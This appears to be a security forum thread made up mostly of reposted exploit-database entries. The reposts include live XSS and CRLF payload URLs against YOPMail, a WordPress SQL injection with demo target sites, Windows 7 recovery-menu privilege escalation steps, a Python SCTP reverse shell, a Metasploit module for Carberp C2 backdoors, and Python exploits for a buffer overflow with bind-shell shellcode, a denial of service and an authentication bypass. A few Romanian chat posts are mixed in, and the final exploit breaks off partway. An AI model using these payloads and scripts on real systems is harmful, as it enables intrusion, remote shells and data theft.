damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com
  12. Matt
    Description : YOPMail suffers from cross site scripting, HTTP response splitting, CRLF injection, and session token handling vulnerabilities. Author : Juan Carlos Garcia Source : YOPMail XSS / Injection / HTTP Response Splitting ? Packet Storm Code : YOPMAIL(Anonymous&Free email address) CRLF Injection-HTTP Response Spliting/XSS/Session Token in URL ================================================================================================================================================== Report-Timeline: ================ 2013-06-01: Researcher Notification 2013-06-03: RESPONSE 2013-06-07: Ask About the issues 2013-06-10: Vendor Feedback 2013-06-13: Not Fixed 2013-06-16: Ask About the Issues 2013-06-27: Not Fixed / Not Response 2013-06-28: Full Disclosure I-VULNERABILITIES ====================== #Title: YOPMAIL(Anonymous&Free email address) YopMail CRLFInjection-HTTP Response Spliting / XSS/ Session Token in URL / #Vendor:http://www.yopmail.com #Author:Juan Carlos García (@secnight) #Follow me http://www.highsec.es http://hackingmadrid.blogspot.com Twitter:@secnight II-Introduction: ====================== YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days. It's possibble to send a message to another YOPmail address mail. No registration required. Firefox, Internet Explorer 7 and Opera add-ons are downloadable. There are alternate domains. Domains @yopmail.fr @yopmail.net @cool.fr.nf @jetable.fr.nf @nospam.ze.tc @nomail.xl.cx @mega.zik.dj @speed.1s.fr @courriel.fr.nf @moncourrier.fr.nf @monemail.fr.nf @monmail.fr.nf @mail.mezimages.net The site has new domains every three months. III-PROOF OF CONCEPT ====================== CRLF INJECTION-HTTP RESPONSE SPLITING ______________________________________ The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks Attacks ------- http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211 http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524 http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919 http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717 Multiple CROSS SITE SCRIPTING _______________________________ The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed. Attacks -------- Below I expose a few vulnerabilities because many failures of this type in this web service... So much XSS.. Affected items /add-domain.php /alternate-domains.php /alternate-email-address.php /conditions.php /contact.php /definitions/email-jetable.php /definitions/mail-anonyme.php /definitions/spam.php /donation.php /email-anonyme.php /email-generator.php /en /en/add-domain.php /en/alternate-domains.php /en/alternate-email-address.php /en/conditions.php /en/contact.php /en/definitions /en/definitions/email-jetable.php /en/definitions/mail-anonyme.php /en/definitions/spam.php /en/donation.php /en/email-anonyme.php /en/email-generator.php /en/faq.php /en/images /en/index.php /en/plugins.php /en/privacy.php /en/send-mail.php /en/style /en/style/pic /en/yopmail-chat.php /es /es/add-domain.php /es/alternate-domains.php /es/alternate-email-address.php /es/conditions.php /es/contact.php /es/definitions /es/definitions/email-jetable.php /es/definitions/mail-anonyme.php /es/definitions/spam.php /es/donation.php /es/email-anonyme.php /es/email-generator.php /es/faq.php /es/images /es/index.php /es/plugins.php /es/privacy.php /es/send-mail.php /es/style /es/style/pic /es/yopmail-chat.php /faq.php /fr /fr/add-domain.php /fr/alternate-domains.php /fr/alternate-email-address.php /fr/conditions.php /fr/contact.php /fr/definitions /fr/definitions/email-jetable.php /fr/definitions/mail-anonyme.php /fr/definitions/spam.php /fr/donation.php /fr/email-anonyme.php /fr/email-generator.php /fr/faq.php /fr/images /fr/index.php /fr/plugins.php /fr/privacy.php /fr/send-mail.php /fr/style /fr/style/pic /fr/yopmail-chat.php /index.php /it /it/add-domain.php /it/alternate-domains.php /it/alternate-email-address.php /it/conditions.php /it/contact.php /it/definitions /it/definitions/email-jetable.php /it/definitions/mail-anonyme.php /it/definitions/spam.php /it/donation.php /it/email-anonyme.php /it/email-generator.php /it/faq.php /it/images /it/index.php /it/plugins.php /it/privacy.php /it/send-mail.php /it/style /it/style/pic /it/yopmail-chat.php /pl /pl/add-domain.php /pl/alternate-domains.php /pl/alternate-email-address.php /pl/conditions.php /pl/contact.php /pl/definitions /pl/definitions/email-jetable.php /pl/definitions/mail-anonyme.php /pl/definitions/spam.php /pl/donation.php /pl/email-anonyme.php /pl/email-generator.php /pl/faq.php /pl/images /pl/index.php /pl/plugins.php /pl/privacy.php /pl/send-mail.php /pl/style /pl/style/pic /pl/yopmail-chat.php /plugins.php /privacy.php /ru /ru/add-domain.php /ru/alternate-domains.php /ru/alternate-email-address.php /ru/conditions.php /ru/contact.php /ru/definitions /ru/definitions/email-jetable.php /ru/definitions/mail-anonyme.php /ru/definitions/spam.php /ru/donation.php /ru/email-anonyme.php /ru/email-generator.php /ru/faq.php /ru/images /ru/index.php /ru/plugins.php /ru/privacy.php /ru/send-mail.php /ru/style /ru/style/pic /ru/yopmail-chat.php /send-mail.php /uk /uk/add-domain.php /uk/alternate-domains.php /uk/alternate-email-address.php /uk/conditions.php /uk/contact.php /uk/definitions /uk/definitions/email-jetable.php /uk/definitions/mail-anonyme.php /uk/definitions/spam.php /uk/donation.php /uk/email-anonyme.php /uk/email-generator.php /uk/faq.php /uk/images /uk/index.php /uk/plugins.php /uk/privacy.php /uk/send-mail.php /uk/style /uk/style/pic /uk/yopmail-chat.php /yopmail-chat.php /zh /zh/add-domain.php /zh/alternate-domains.php /zh/alternate-email-address.php /zh/conditions.php /zh/contact.php /zh/definitions /zh/definitions/email-jetable.php /zh/definitions/mail-anonyme.php /zh/definitions/spam.php /zh/donation.php /zh/email-anonyme.php /zh/email-generator.php /zh/faq.php /zh/images /zh/index.php /zh/plugins.php /zh/privacy.php /zh/send-mail.php /zh/style /zh/style/pic /zh/yopmail-chat.php Method GET ---------- http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E Method POST ------------ http://www.yopmail.com:80/send-mail.php Request Data act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec- 1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst http://www.yopmail.com:80/send-mail.php Request Data act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker- dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst http://www.yopmail.com:80/send-mail.php Request Data act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner- 7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst http://www.yopmail.com:80/zh/send-mail.php Request Data act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt %28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst http://www.yopmail.com:80/zh/send-mail.php Request Data act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson- 0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst SESSION TOKEN IN URL ____________________ This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL. URLs could be logged or leaked via the Referer header. Affected items -------------- /cr.php (78a3a31e275b316f36665b35eb4bfe21) /email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1) /email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3) /email-anonyme.php (f508baf21a69429be4914c4008baf8ca) /en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) /zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) Examples Method GET ---------- http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID& http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 Method POST ----------- /email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 Request Data act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas- 1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst /email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 Request Data act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas- 1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst IV. CREDITS ------------------------- This vulnerabilities has been discovered by Juan Carlos García(@secnight) V. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.
  13. Matt
    Description : If you have physical access to a Microsoft Windows 7 SP1 instance, you can leverage the "Launch startup Repair" functionality to gain SYSTEM access. Author : Anastasios Monachos Source : Windows 7 SP1 Local Access SYSTEM Compromise ? Packet Storm Code : ############################################################################################## # Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com] # Vendor: Microsoft # Affected Software: Windows 7 SP1 (and probably other) # Title: Owning Windows 7 - From Recovery to "nt authority\system" - Physical Access Required # See also: http://intelcomms.blogspot.com/2013/05/owning-windows-7-from-recovery-to-nt.html ############################################################################################## Just wanted to share with you the below, which I have already communicated with Microsoft - according to MSRC team "An attacker with unrestricted physical access can certainly manipulate a system in multiple ways. This is not something we consider a security vulnerability." thus no CVE "Computer owners should provide for physical security of systems as part of best practices. There is more discussion of physical access in the "10 Immutable Laws of Security" (http://technet.microsoft.com/en-us/library/hh278941.aspx) under Law #3". The scenario is as follows: 1. Windows 7 SP1, and 2. Workstation with BIOS settings to restrict boot up from CD, and 3. Workstation joined in Windows Active Directory or Standalone By forcing the machine to boot or shutdown abnormally (eg pressing the ctl+alt+del during bootup or press the power button (kill) during shutdown) Windows will enter the "Windows Error Recovery" menu asking us whether we wish to "Launch startup Repair (recommended)" or "Start Windows Normally" Select the "Launch Startup Repair (recommended)" Recovery process will display a "Windows is loading files...." message, then after a while we enter the "Startup Repair" process (graphical interface) A message might appear asking you if you want to "Restore your computer using System Restore", select Cancel, if it does. Shortly, a new message box will come up prompting us "Send information about the problem (recommended)" or "Don't send" and at the bottom of this dialog box the option with label "View problem details" exist. Click on "View problem details", you will get information such as "Problem signature" and more. Note that at the very bottom of this textarea a link exists which points to the X drive (X:\windows\system32\en-US\erofflps.txt) Clicking on the link; Notepad launches From there, one can go to File | Open view all contents of the C/D/X/etx drive (c:\documents and settings\\* and any other drive available) copy files to/from different locations/drives, create files, launch cmd.exe, backdoor Windows etc. Through ms-dos prompt we noticed we had been granted with "nt authority\system" privileges which makes sense having so, to perform the recovery operation, but it's too easily for anyone to abuse them providing he has casual physical access (eg in environments such as libraries, universities, offices, reception front desks etc; I will leave your imagination from this point to work:) As probably others may agree with me, "nt authority\system" access should not be so easy given (or acquired by default, design, whatever, name it), at a minimum a password prompt or other control should exist to prevent the ownage.
  14. Matt
    Description : WordPress WP-Private-Messages this party plugin suffers from a remote SQL injection vulnerability. Author : IeDb Source : WordPress WP-Private-Messages SQL Injection ? Packet Storm Code : The Wordpress wp-private-messages Plugin suffers from a Sql Injection vulnerability. ################################# # Iranian Exploit DataBase # Www.exploit.IrIsT.Ir ################################# # Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Home : http://exploit.IrIsT.Ir # Software Link : http://wordpress.org/plugins/wp-private-messages/ # Security Risk : High # Tested on : Linux ################################# # Exploit : # http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] # Dem0 : # http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] # http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] ################################# # Vuln Source C0de : # Lin 145 : # $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC"); # And Lin 160 : # echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>"; ################################# # Exploit Archive : http://exploit.irist.ir/exploits-148.html #################################
  15. Matt
    Urmeaza pe 2 Lituania, cu 28,18 Mbps, si Taiwan pe locul 3 cu 37,78 Mbps. Probabil pe 2 Lituania cu 38 mbps. Am mai citit o astfel de stire acum un an sau 2 iar Timisoara era pe 3 atunci.
  16. Matt
    Problemele Facebook in ceea ce priveste securitatea si intimitatea online a utilizatorilor sai au fost mereu pe tapet intr-o masura mai mare sau mai mica. Recent, un raport Norton a demonstrat ca aplicatia oficiala “Facebook” pentru Android trimite automat numarul tau de telefon spre serverele retelei de socializare, chiar inainte sa te loghezi. In replica, Facebook a spus ca vor remedia problema si aparent au facut-o cu un update si au sustinut ca vor sterge numerele de telefon de pe server. Nu este mentionat insa nicaieri ce modificari aduce acea actualizare. Avand in vedere ca aplicatia a fost descarcata de peste 7 milioane de ori, inchipuiti-va ce baza de date cu numere de telefon avea Facebook… O privire mai atenta asupra permisiunilor aplicatiei Facebook pentru Android nu va face decat sa te sperie, fiindca are caracteristicile unui spyware. Astfel, teoretic, aplicatia poate oricand sa foloseasca microfonul sau camera pentru a inregistra, face poze sau filma, fara acordul utilizatorului. Dat fiind precedentul descris mai sus… tare ma tem ca acest acces nelimitat la resursele smartphone-ului nu este de bun augur. Sursa: Norton: Android app skips consent, gives Facebook servers user phone numbers | ZDNet
  17. Matt
    Trebuia sa isi faca norma de posturi de "calitate".
  18. Matt
    Description : This is a reverse shell over SCTP implemented in Python. Currently it does not use SSL, but may evade most firewalls and IDS devices as many of them seemingly have no rules in place to check SCTP traffic. Author : Infodox Source : SCTP Reverse Shell ? Packet Storm Code : #!/usr/bin/python # SCTP Reverse Shell (TCP mode) # Requires pysctp and sctp to be working # on the victim box. # My perfect saturday... Involves # # infodox - Insecurety Research 2013 # insecurety.net | @info_dox # I probably imported too much things. Who cares. import socket import _sctp import sctp from sctp import * import os import subprocess host = '127.0.0.1' # CHANGEME port = 1337 # CHANGEME socket.setdefaulttimeout(60) s = None try: s = sctpsocket_tcp(socket.AF_INET) s.connect((host,port)) s.send('g0tsh3ll!\n') save = [ os.dup(i) for i in range(0,3) ] os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) shell = subprocess.call(["/bin/sh","-i"]) [ os.dup2(save[i],i) for i in range(0,3)] [ os.close(save[i]) for i in range(0,3)] os.close(s.fileno()) except Exception: print "Connection Failed! Is there even a listener?" pass
  19. Matt
    Description : Xorbin Analog Flash Clock plugin version 1.0 for Joomla suffers from a flash-based cross site scripting vulnerability. Author : Prakhar Prasad, Rafay Baloch Source : Xorbin Analog Flash Clock 1.0 For Joomla XSS ? Packet Storm Code : ==================================================================== Xorbin Analog Flash Clock 1.0 Extension for Joomla Flash-based XSS ==================================================================== Description: This plugin displays analog flash clock on your website. It's easy to use and it's highly customizable. You can add analog flash clock to your website as a widget and use as many clocks as you like on one page Published: 30-06-2013 Version : 1.0 Severity : Low to Moderate CVSS Score: 5 CVE: 2013-4692 Authors : Prakhar Prasad http://www.prakharprasad.com Rafay Baloch http://www.rafayhackingarticles.net Download : http://extensions.joomla.org/extensions/calendars-a-events/time/clocks/21026 Vendor : XORBin http://www.xorbin.com/ Google Dork: inurl:mod_xoranalogclock Details: The vulnerability exists in "xorAnalogClock.swf" file of this extension, "widgetUrl" and "urlWindow" parameter is taken from external input and is passed first into URLRequest() and then to navigateToURL() function. Pseudocode: navigateToURL(new URLRequest(_root.widgetUrl), _root.urlWindow); Proof-of-Concept: http://domain.tld/joomla/modules/mod_xoranalogclock/media/xorAnalogClock.swf#?urlWindow=_self&widgetUrl=javascript:alert(1); Clicking on clock will execute the Javascript payload. Solution: Similar method can be applied as described here - https://code.google.com/p/doctype-mirror/wiki/ArticleFlashSecurityGetURL
  20. Matt
    Description : This Metasploit module exploits backdoors that can be sighted all over the leaked source code of the Carberp botnet C2 Web Panel. Author : Luis Santana, bwall, Steven K Source : Carberp Web Panel C2 Backdoor Remote PHP Code Execution ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Carberp Web Panel C2 Backdoor Remote PHP Code Execution', 'Description' => %q{ This module exploits backdoors that can be sighted all over the leaked source code of the Carberp botnet C2 Web Panel. }, 'License' => MSF_LICENSE, 'Author' => [ 'bwall(Brian Wallace) <bwallace[at]cylance.com>', # msf module 'connection(Luis Santana) <hacktalkblog[at]gmail.com>', # exploit reporting 'Steven K <xylitol[at]malwareint[d0t]com>' # discovery and reporting ], 'References' => [ ['URL', 'http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html'] ], 'Privileged' => false, 'Payload' => { 'Keys' => ['php'], 'Space' => 10000, 'DisableNops' => true }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['carberp', {}] ], 'DisclosureDate' => 'Jun 28 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI',[true, "The path to the backdoor, often just index.php", "/index.php"]), OptString.new('BOTID', [true, 'Hardcoded backdoor bot ID that can run PHP eval', 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV']), ],self.class) end def check confirm_string = rand_text_alpha(8) cmd = "echo '#{confirm_string}';" shell = http_send_command(cmd) check_code = Exploit::CheckCode::Safe if shell and shell.body.include?(confirm_string) check_code = Exploit::CheckCode::Vulnerable end check_code end def http_send_command(cmd) uri = normalize_uri(target_uri.path.to_s) request_parameters = { 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'id' => datastore['BOTID'], "data" => Rex::Text.encode_base64(cmd.unpack('H*')) } } res = send_request_cgi(request_parameters) res end def exploit http_send_command(payload.encoded) end end
  21. Matt
    Author : metacom Source : AVS Media Player 4.1.11.100 (.ac3) - Denial of Service Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/44cd3f96f572b1c4288fcdbfc1aa2093-AVSMediaPlayer.exe Code : #!/usr/bin/python print """ [+]Exploit Title:AVS Media Player(.ac3)Denial of Service Exploit [+]Vulnerable Product:4.1.11.100 [+]Download Product:http://www.avs4you.com/de/downloads.aspx [+]All AVS4YOU Software has problems with format .ac3 [+]Date: 29.06.2013 [+]Exploit Author: metacom [+]RST [+]Tested on: Windows 7 """ buffer=( "\x0B\x77\x3E\x68\x50\x40\x43\xE1\x06\xA0\xB9" "\x65\xFF\x3A\xBE\x7C\xF9\xF3\xE7\xCF\x9F\x3E" ) junk = "\x41" * 5000 bob = "\x42" * 100 exploit = buffer+ junk + bob try: rst= open("exploit.ac3",'w') rst.write(exploit) rst.close() print("\nExploit file created!\n") except: print "Error"
  22. Matt
    Author : Chako Source : C.P.Sub 4.5 - Authentication Bypass Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/ec51b632d15a04cdc4a5974372600f7a-cpsub_v4.5.zip Code : #!/usr/bin/python # # #################################################################### # # Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication # Date: 2013/6/27 # Exploit Author: Chako # Vendor Homepage: http://www.cooltey.org/ping/php.php # Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip # Version: <= v4.5 # Tested on: Windows 7 # # #################################################################### Improper Authentication: ========================================== Description: C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege. Therefore an attacker could simply change the value for "user_com=" parameter to gain admin privilege. /check.php (LINE: 36-44) -------------------------------------------------------------- if($_GET[user_com] != "") { $user_com = $_GET[user_com]; }elseif($_POST[user_com] != "") { $user_com = $_POST[user_com]; } if($user_com == "biggest") { -------------------------------------------------------------- Exploit: -------------------------------------------------------------- change http://Example_Target/info.php?cookie=yes&user_com=second to http://Example_Target/info.php?cookie=yes&user_com=biggest Misconfiguration ========================================== There are some default accounts for C.P.Sub <= v4.5 that allows an attacker to access back-end management page. It could lead to further attack.
  23. Matt
    Author : Jacob Holcomb Source : Static HTTP Server 1.0 - SEH Overflow Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/7b16657e72825fc53b5072d4a1d04b7b-static-httpd.zip Code : #!/usr/bin/env python import os # # Title************************Static HTTP Server SEH Overflow - HTTP Config - http_tiplist # Discovered and Reported******June 2013 # Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators # Exploit/Advisory*************http://infosec42.blogspot.com/ # Software*********************Static HTTP Server v1.0 (Listens on TCP/80) # *****************************http://sourceforge.net/projects/static-httpd/?source=dlp # Tested Platform*************Winodws XP SP2 # CVE**************************Static HTTP Server 1.0 - SEH Overflow: Pending # # Notes: # Multiple HTTP commands and headers are vulnerable to overflows and trigger an exception, but # I was unable to control the SEH handler with anyting but configuration options in the http.ini. # def fileCreate(): print "\n[*] Your current file directory is %s. " % os.getcwd() try: File = "http.ini" fileOpen = open(File, "w") print "[*] Configuration file %s will be written to %s." % (File, os.getcwd()) except: print "\n[*] ERROR! There was an issue creating your file. Please make sure you have write access to %s!!!!!\n" % os.getcwd return fileOpen def main(): NOP1 = "\x90" * 1691 NOP2 = NOP1[0:349] prev = "\xEB\xF6\x90\x90" #Short JMP -10 bytes Handler = "\x9E\x1D\x40\x00"#00401D9E httpd.exe jmp = "\xe9\x87\xee\xff\xff"#FFFFEE87#"\xe9\xA3\xfe\xff\xff" #344 Byte Bind Shell TCP/4444 shellcode = ("\xdb\xdd\xba\x81\x90\xd3\xb1\xd9\x74\x24\xf4\x5b\x2b\xc9" + "\xb1\x50\x31\x53\x18\x83\xeb\xfc\x03\x53\x95\x72\x26\x4d" + "\xff\x99\x84\x46\x06\xa2\xe8\x68\x98\xd6\x7b\xb3\x7c\x62" + "\xc6\x87\xf7\x08\xcc\x8f\x06\x1e\x45\x20\x10\x6b\x05\x9f" + "\x21\x80\xf3\x54\x15\xdd\x05\x85\x64\x21\x9c\xf5\x02\x61" + "\xeb\x02\xcb\xa8\x19\x0c\x09\xc7\xd6\x35\xd9\x3c\x3f\x3f" + "\x04\xb7\x60\x9b\xc7\x23\xf8\x68\xcb\xf8\x8e\x30\xcf\xff" + "\x7b\xcd\xc3\x74\xf2\xbe\x3f\x97\x64\xfc\x0e\x7c\x02\x89" + "\x33\xb2\x40\xcd\xbf\x39\x26\xd2\x12\xb6\x87\xe2\x32\xa1" + "\x89\xbd\xc4\xdd\xc6\xbe\x0e\x7b\xb4\x26\xc6\xb7\x08\xcf" + "\x61\xcb\x5e\x50\xd9\xd4\x4f\x06\x2a\xc7\x8c\xec\xfc\xe7" + "\xbb\x4c\x75\xf2\x22\xf2\x68\xf5\xa8\xa1\x18\x04\x52\x99" + "\xb4\xd1\xa5\xef\xe9\xb5\x4a\xd9\xa2\x6a\xe6\xb5\x17\xce" + "\x5b\x79\xc4\x2f\x8b\x1b\x82\xde\x70\x82\x01\x68\x69\xdf" + "\xcd\xce\x70\x90\xca\x58\x7a\x86\xbe\x76\xd5\x72\xc1\xa7" + "\xbd\xd8\x90\x66\xd7\x76\x15\xa0\x74\x2c\x16\x9d\x13\x2b" + "\xa1\x98\xad\xe4\xce\x73\x7d\x5f\x64\x29\x81\x8f\x17\xb9" + "\x9a\x49\xd1\x43\x32\x55\x0b\xe6\x43\x79\xd5\x63\xd8\x1c" + "\x71\x17\x4d\x68\x64\xbd\xdd\x33\x4f\x8e\x57\x24\xe5\x4a" + "\xe1\x49\xc8\x92\x02\x27\xd4\x51\xc8\xc6\x6a\x7a\x81\xba" + "\x10\xba\x0e\x6f\x4f\xd2\x22\x8e\x3c\x35\x3c\x1b\x06\xc5" + "\x14\xbf\xd1\x6b\xc8\x11\x8c\xe1\xeb\xc0\x7f\xa3\xba\x1d" + "\xaf\x23\x90\x3b\x4a\x7a\xb9\x44\x82\xe8\xc1\x44\x1d\x12" + "\xed\x30\x36\x10\x8d\x83\xdc\x17\x44\x59\xe3\x38\x01\xae" + "\x91\xbd\x8d\x1d\x5a\x6b\xce\x72") sploit = NOP2 + shellcode + NOP1 + jmp + prev + Handler File = fileCreate() Config = (""" # HTTP Daemon config file # GarajCode programed by Savu Andrei # This is the configuration file # You can configure the maximum number # of simultanious connections max_http_connections = 256 # The port on which the server will listen http_port = 80 # Multiple connections from same computer http_mcsc = 1 # Banned ip list - separed by ; http_ubip = 0 # http_biplist = "" # Trusted ip list - separed by ; http_utip = 0 # http_tiplist = "%s" """) % sploit File.write(Config) File.close() if __name__ == "__main__": main()
  24. Matt
    Author : Mohamed Clay Source : Bifrost 1.2d - Remote Buffer Overflow Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/ecb723cd9b2dbd814745928f9185f6a9-BitFrost1.zip Code : #!/usr/bin/python2.7 #By : Mohamed Clay import socket from time import sleep from itertools import izip, cycle import base64 import threading import sys def rc4crypt(data, key): x = 0 box = range(256) for i in range(256): x = (x + box[i] + ord(key[i % len(key)])) % 256 box[i], box[x] = box[x], box[i] x = 0 y = 0 out = [] for char in data: x = (x + 1) % 256 y = (y + box[x]) % 256 box[x], box[y] = box[y], box[x] out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) return ''.join(out) def bif_len(s): while len(s)<8: s=s+"00" return s def header(s): a=(s[0]+s[1]).decode("hex") a+=(s[2]+s[3]).decode("hex") a+=(s[4]+s[5]).decode("hex") a+=(s[5]+s[6]).decode("hex") return a def random(): a="" for i in range(0,8): a+="A"*1000+"|" return a def exploit(): s.sendall(out) def usage(): print "\n\n\t***************************" print "\t* By : Mohamed Clay *" print "\t* Bifrost 1.2d Exploit *" print "\t***************************\n" print "\t Usage : ./bifrost1.2.1 host port" print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n" if len(sys.argv)!=3: usage() exit() HOST=sys.argv[1] PORT=int(sys.argv[2]) 